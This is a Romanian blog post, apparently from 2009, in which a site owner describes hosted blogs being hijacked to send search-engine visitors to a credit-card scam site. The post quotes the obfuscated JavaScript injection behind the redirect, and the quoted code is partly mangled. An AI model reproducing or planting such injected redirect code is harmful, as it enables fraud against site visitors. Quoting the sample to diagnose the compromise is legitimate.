Redirectionare neautorizata via script?
De vreo 4 saptamani am observat ca prin accesarea anumitor site-uri prin intermediul motoarelor de cautare eram redirectionat catre un scam site, al carui proprietar parea a fi un rusnac (pana acum o ora), iar in prezent o tanti din SUA. E incredibil cum isi modifica astia datele de identificare… La fel cum la cateva zile scam site-ul e asociat cu diferite domenii.
Ei bine de cateva zile m-am trezit ca toate site-urile (blogurile) mele gazduite la ixwebhosting.com ma redirectioneaza catre acelasi scam site. Am dat cateva search-uri pe web si se pare ca un troian fie mi-a furat parolele, a intrat in contul de hosting si mi-a scris anumite fisiere pentru a realiza redirectionarea catre site-ul scam, fie serverele celor de la ixwebhosting.com sunt infectate (si se pare ca asta e problema pentru ca pe acelasi server am mai descoperit 3 site-uri care redirectionau la fel) cu un troian.
Am luat legatura cu cei de la tehnic (ixwebhosting.com) dar inutil pt ca oamenii se spargeau in knowledges despre chmod 777 (e vb despre niste permisiuni – nu intru in amanunte ca multi nu vor intelege) si schimbat parole pt ftp. Desi eu le repetam ca mi-am luat toate masurile si am avut grija sa nu dau 777 la directoarele site-ului, ei tot degeaba, ca altfel e imposibil sa am probleme, desi multi care s-au lovit de problema asta pretind ca ar fi vorba de niste vulnerabilitati ce tin de serverul Apache si/sau PHP.
Troianul cu pricina pare sa afecteze direct doar site-urile, nu si vizitatorii: prin intermediul unui script
<s c r i p t l a n g u a g e=J a v a S c r i p t> function sban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,9,59,58,33,23,27,10,25,2,0,0,0,0, ,0,51,56,54,35,16,18,46,50,3,41,12,14,53,15,6,7,11,26,40,62,60,24,34,57,4,31,37, ,0,0,0,32,0,42,38,43,22,21,5,36,28,45,29,1,17,20,13,44,30,47,49,0,55,52,8,61,48, 9,19);for(j=Math.ceil(l/b);j>0;j–){r=”;for(i=Math.min(l,;i>0;i–,l–){w|=(t[x.charCodeAt(p++)-48]) <<s;if(s){r+=String.fromCharCode(121^w&255);w>>=8;s-=2}else{s=6}}document.write®}}sban (‘fkrOP_kfhgZ9PRklpflHngxDd8ffDo_f5xXzJjZfPA4e7UfX5ukOkhe9lg_58WsXjuDXX4mdlxkX XlHX4md7ussexklpwsX7srNDmkXnsxDlslOjxrf9WLlf8fXYosNmxrl@k’) </s c r i p t>
se realizeaza redirectionarea vizitatorilor sositi pe site via motoare de cautare.
Apoi, daca acestia se dovedesc a fi pampalai si isi ofera datele cartilor de credit… pot sa-si ia adio de la banutii de pe respectivele carduri…
Sper sa se rezolve problema prin intermediul celor de la ixwebhosting, sau… altfel am multe nopti de pierdut in fata kmpiuterului…
January 7th, 2009 at 12:22 am
[...] nu stiu pentru cata vreme. E vorba despre codul ce-l suspectam a-l avea scris intr-un fisier de pe blog. Numai ca nu e vorba despre un cod JavaScript ci unul ce vizeaza serverul Apache (nu [...]
January 8th, 2009 at 11:33 am
tu stii cate probleme am avut eu cu sit-ul asta de virus, pfff nici nu iti inchipui, pana cand am dezinstalat AVG, si am bagat kaspersky nimik nu mai am, si am facut o scanare cu trojan remover, si am cautat in regedit orice file trojan si gata merge struna PC, doamne cat mam chinuit dar a meritat:D